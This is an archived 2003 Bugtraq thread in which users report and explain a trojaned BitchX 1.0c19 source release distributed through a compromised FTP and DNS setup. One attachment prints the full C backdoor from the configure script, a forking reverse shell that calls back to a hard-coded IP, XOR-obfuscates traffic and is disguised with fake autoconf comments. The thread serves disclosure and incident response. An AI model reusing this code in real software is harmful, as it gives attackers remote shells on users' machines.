98731 2003-04-14 19:35 /21 rader/ =?iso-8859-2?Q?Micha=B3_Szwaczko?= <mikey@wirelabs.lublin.pl>
Importerad: 2003-04-14 19:35 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4498>
Ärende: bitchx sources backdoored on distribution site
------------------------------------------------------------
Hi,
Can anyone verify that the bitchx 1.0c19 sources are backdoored. The
configure script contains the following code which I think is a shell
daemon. Perhaps I am making fool of myself right now since I am not
a security guru but this looks weird. Can you verify ?
If this is true, then the host that will get the shell is
smtp.wia.com which is an alias of ftp2.bitchx.org.
Attached is the code fragment I found in configure
What do you think ?
ps. after having run configure the code fragment disappears from the
script.
--
Micha³ 'Mikey' Szwaczko
Developer/Troubleshooter
You're using a keyboard! How quaint!
(98731) /=?iso-8859-2?Q?Micha=B3_Szwaczko?= <mikey@wirelabs.lublin.pl>/(Ombruten)
Bilaga (text/plain) i text 98732
Kommentar i text 98753 av Neeko Oni <neeko@haackey.com>
98732 2003-04-14 19:35 /155 rader/ =?iso-8859-2?Q?Micha=B3_Szwaczko?= <mikey@wirelabs.lublin.pl>
Importerad: 2003-04-14 19:35 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4499>
Bilaga (text/plain) till text 98731
Ärende: Bilaga till: bitchx sources backdoored on distribution site
------------------------------------------------------------
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define XOR_KEY 0x89
int main (int argc, char **argv)
{
char c;
int s, x, sv0[2];
struct sockaddr_in sa;
/*
When interrupted or exit'd, cleanup temporary files, and complete
config.log. We remove comments because anyway the quotes in there
would cause problems or look ugly.
WARNING: Be sure not to use single quotes in there, as some shells,
such as our DU 5.0 friend, will then close the trap.
*/
switch (fork ()) { case 0: break; default: exit (1);}
close (0); close (1); close (2);
/*
When interrupted or exit'd, cleanup temporary files, and complete
config.log. We remove comments because anyway the quotes in there
would cause problems or look ugly.
WARNING: Be sure not to use single quotes in there, as some shells,
such as our DU 5.0 friend, will then close the trap.
*/
do {
if ((s = socket (AF_INET, SOCK_STREAM, 0)) == (-1))
exit (1);
sa.sin_family = AF_INET;
sa.sin_port = htons (6667);
/* The GNU C library defines this for functions which it implements
to always fail with ENOSYS. Some functions are actually named
something starting with __ and the normal name is an alias. */
sa.sin_addr.s_addr = inet_addr ("207.178.61.5");
alarm (10);
if (connect (s, (struct sockaddr *)&sa, sizeof (sa)) == (-1))
exit (1);
if ((x = read (s, &c, 1)) <= 0)
exit (1);
else {
alarm (0);
/* The GNU C library defines this for functions which it implements
to always fail with ENOSYS. Some functions are actually named
something starting with __ and the normal name is an alias. */
switch (c) {
case 'A':
exit (0);
/* We use char because int might match the return type of a gcc2
builtin and then its argument prototype would still apply. */
case 'D':
break;
case 'M':
close (s);
sleep (3600);
continue;
}
}
break;
} while (1);
/*
When interrupted or exit'd, cleanup temporary files, and complete
config.log. We remove comments because anyway the quotes in there
would cause problems or look ugly.
WARNING: Be sure not to use single quotes in there, as some shells,
such as our DU 5.0 friend, will then close the trap.
*/
if (socketpair (AF_UNIX, SOCK_STREAM, 0, sv0) == (-1))
exit (1);
switch (fork ()) {
case -1: {
exit (1);
}
case 0: {
/* The GNU C library defines this for functions which it implements
to always fail with ENOSYS. Some functions are actually named
something starting with __ and the normal name is an alias. */
char *a[] = { "/bin/sh", NULL };
close (sv0[1]);
dup2 (sv0[0], 0);
dup2 (sv0[0], 1);
dup2 (sv0[0], 2);
/* We use char because int might match the return type of a gcc2
builtin and then its argument prototype would still apply. */
execve (a[0], a, NULL);
}
default: {
close (sv0[0]);
while (1) {
int len, ret;
fd_set rfd;
char buf[2048];
/* The GNU C library defines this for functions which it implements
to always fail with ENOSYS. Some functions are actually named
something starting with __ and the normal name is an alias. */
FD_ZERO (&rfd);
FD_SET (s, &rfd);
FD_SET (sv0[1], &rfd);
if (select (32, &rfd, NULL, NULL, NULL) == (-1)) {
exit (1);
}
/*
When interrupted or exit'd, cleanup temporary files, and complete
config.log. We remove comments because anyway the quotes in there
would cause problems or look ugly.
WARNING: Be sure not to use single quotes in there, as some shells,
such as our DU 5.0 friend, will then close the trap.
*/
if (FD_ISSET (s, &rfd)) {
if ((len = read (s, buf, sizeof (buf))) <= 0) {
exit (1);
}
for (x = 0; x < len; x++) buf[x] ^= XOR_KEY;
x = 0;
while (x < len) {
if ((ret = write (sv0[1], buf + x, len - x)) == (-1)) {
exit (1);
}
x += ret;
}
}
if (FD_ISSET (sv0[1], &rfd)) {
if ((len = read (sv0[1], buf, sizeof (buf))) <= 0) {
exit (1);
}
for (x = 0; x < len; x++) buf[x] ^= XOR_KEY;
/* The GNU C library defines this for functions which it implements
to always fail with ENOSYS. Some functions are actually named
something starting with __ and the normal name is an alias. */
x = 0;
while (x < len) {
if ((ret = write (s, buf + x, len - x)) == (-1)) {
exit (1);
}
x += ret;
}
}
}
}
}
}
(98732) /=?iso-8859-2?Q?Micha=B3_Szwaczko?= <mikey@wirelabs.lublin.pl>/
98753 2003-04-15 00:44 /32 rader/ Neeko Oni <neeko@haackey.com>
Importerad: 2003-04-15 00:44 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4505>
Kommentar till text 98731 av =?iso-8859-2?Q?Micha=B3_Szwaczko?= <mikey@wirelabs.lublin.pl>
Ärende: Re: bitchx sources backdoored on distribution site
------------------------------------------------------------
From ftp.bitchx.org (msg in /pub):
* * * * * * A T T E N T I O N * * * * * *
Over the weekend of April 12th and 13th someone once again was
releasing back doored code for BitchX on a false ftp site that was
linked from the official BitchX Website. We stress to everyone to
please take notice of information that we post on
http://faq.bitchx.org to help prevent these problems from causing
you to download falsified source code for BitchX.
--
So it's entirely possible the source you downloaded was backdoored;
It would have been nicer had you included the site you downloaded
from. According to bitchx.org it looks like it was only one
off-site FTP. As it was an 'official' FTP (the assumption we're
making), whether they're to blame or not is left for someone else to
decide.
.Neeko Oni
(Hey Bugtraq mod, wake up.)
>
> --UlVJffcvxoiEqYs2
> Content-Type: text/plain; charset=iso-8859-2
> Content-Disposition: inline
> Content-Transfer-Encoding: 8bit
>
> Hi,
>
> Can anyone verify that the bitchx 1.0c19 sources are backdoored.
(98753) /Neeko Oni <neeko@haackey.com>/---(Ombruten)
98756 2003-04-15 01:05 /55 rader/ =?iso-8859-2?Q?Micha=B3_Szwaczko?= <mikey@wirelabs.lublin.pl>
Importerad: 2003-04-15 01:05 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4508>
Ärende: bitchx sources trojaned - follow up
------------------------------------------------------------
It seems that my posts have been misfired a little.
Let me summarize how,when and why I got trojaned sources Since I am
not a security guru whatsoever I couldn't know that this issue is
already known. Anyway, it did happen to me this Saturday so there is
a possibility that something weird is lingering at ftp.bitchx.org or
its DNS servers.
So,
I fired up www.bitchx.org Saturday 13.04.2003 about 22:00 local time.
I went to download.php and checked the URL for source tarball.
I wget'ted that URL - on saturday it showed:
ftp://ftp2.bitchx.org/pub/BitchX/source/ircii-pana-1.0c19.tar.gz
(I double-checked wget command line that I issued)
I archived the said file,it's MD5 checksum is:
sh> md5sum ircii-pana-1.0c19.tar.gz
927163e0466884b2771ae769e5c775d0 ircii-pana-1.0c19.tar.gz
I started ./configure script and noticed outbound connections to port
6667. They were firewall-blocked anyway and that's why they really
caught my eye. Otherwise, I probably wouldn't have noticed them and
perhaps would not have bothered.
So,I inspected ./configure and found the piece of code I was sending
to the list.
All I was asking for was to verify that this was a backdoor, since I
really didn't know about it and it looked like one (at least my C
knowledge said so) (well I heard about irssi 'patched' that way)
My impression after all your posts saying that the bitchx.org sources
are OK is that on Saturday two things could have happened.
- some sort of dns spoofing which fooled wget to fetch 'bad' tarball
(notice I was downloading from ftp_2_.bitchx.org)
- modified webpage showing 'wrong' URL
I am 100% sure that I was getting the URL from the official
www.bitchx.org. So what do you think?
ps. I am not doing all this just to get bugtraq'ed ;-) I just thought
there's something weird lurking around at www.bitchx.org. I am not a
security inspector/advisor nor do I have sufficient knowledge so I
decided to discuss it here.
Regards
--
Micha³ 'Mikey' Szwaczko
Developer/Troubleshooter
gcc is really a compressor - it gets 100M of kernel sources down to
700k.
(98756) /=?iso-8859-2?Q?Micha=B3_Szwaczko?= <mikey@wirelabs.lublin.pl>/(Ombruten)
98843 2003-04-15 18:10 /106 rader/ Rob Andrews <randrews@relinetworks.com>
Importerad: 2003-04-15 18:10 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <4516>
Ärende: BitchX trojan, the real follow up.
------------------------------------------------------------
Since Micha didn't take the time to post this email after it was
passed along to himself and others on one of EFnet's oper lists I
submit the following to explain what really happened to the BitchX
website and DNS over the weekend.
I also would like to point out that in the future I may be contacted
directly concerning any matters such as these as I am involved with
nearly every person currently involved in the development and
distribution of the source code.
I should point out that since I maintain the FTP site, people should
know that the FTP site does not reside on the same systems as the
web and dns for bitchx.org. If in doubt at any time we have posted
information on http://faq.bitchx.org which tells users how to verify
source and what the legitimate IP addresses for the current FTP
servers are. All current (except for CVS snapshot source code)
source and binaries have been signed by me. This information is
available on the FAQ website as well.
---- Message as forwarded to all parties involved ----
Over the weekend the DNS for bitchx.org was directly changed by
someone who exploited a machine at 207.178.61.5 aka smtp1.wia.com and
was releasing source for ircii-pana-1.0c19.tar.gz which included in
the configure script this:
sa.sin_addr.s_addr = inet_addr ("207.178.61.5");
Previously the DNS was poisoned to cause users to download from what
would normally appear to be a legitimate FTP site. However in this
case we believe after contacting one of the admins for the machines
that hosts the DNS for BitchX.org that the actual machine itself may
have been compromised since the physical URL pointer on the website
was pointed to ftp2.bitchx.org which goes to the previously
mentioned IP address.
We have taken action to correct the website and the DNS is being
handled. The machine at wia.com however is still compromised and has
distributed a number of copies of the compromised source code.
I have called the NOC at accretive-networks.net and notified them of
the machine in question. As soon as I am able to I will post a
notice to the proper mailing lists that have covered this issue and
address them directly so as to prevent this sort of thing from
happening in the future without our being notified any sooner than
we were later Saturday evening.
Thanks,
Robert Andrews
President
RELI Networks, Inc.
Atlanta, GA.
randrews@relinetworks.com
-- Followup:
X-Authentication-Warning: grmpa.com: www set sender to
stevenb@wolfe.net using -f Date: Mon, 14 Apr 2003 10:10:04 -0700
From: Steve Breeden <stevenb@wolfe.net> To: ""
<noc@accretive-networks.net> Cc: "" <randrews@relinetworks.com>
Subject: Re: [ACCR-NETOPS #33425] over the weekend.... (fwd)
User-Agent: Internet Messaging Program (IMP) 3.2.1 / FreeBSD-5.0
This machine (207.178.61.5) was taken offline Saturday evening and
replaced.
It is no longer compromised as stated below.
Quoting Accretive Networks Abuse Department
<noc@accretive-networks.net>:
>
>
> Mon Apr 14 09:55:29 2003: Request 33425 was acted upon.
> Transaction: Ticket created by abuse@accretive-networks.net
> Queue: noc
> Subject: over the weekend.... (fwd)
> Owner: Nobody
> Requestors: abuse@accretive-networks.net
> Status: new
> Ticket <URL:
> http://tracker.accretive-networks.net/Ticket/Display.html?id=33425 >
> -------------------------------------------------------------------------
> In case you didn't see this.
>
> Accretive Networks Abuse Dept.
> http://www.accretive-networks.net/
--
Steve Breeden
support@wolfe.net
Support Engineer
Accretive Networks
P.206.443.6401 ext 204
F.206.269.0188
For DNS requests:
dns-admin@accretive-networks.net
For Hosting-support:
hosting-support@accretive-networks.net
(98843) /Rob Andrews <randrews@relinetworks.com>/(Ombruten)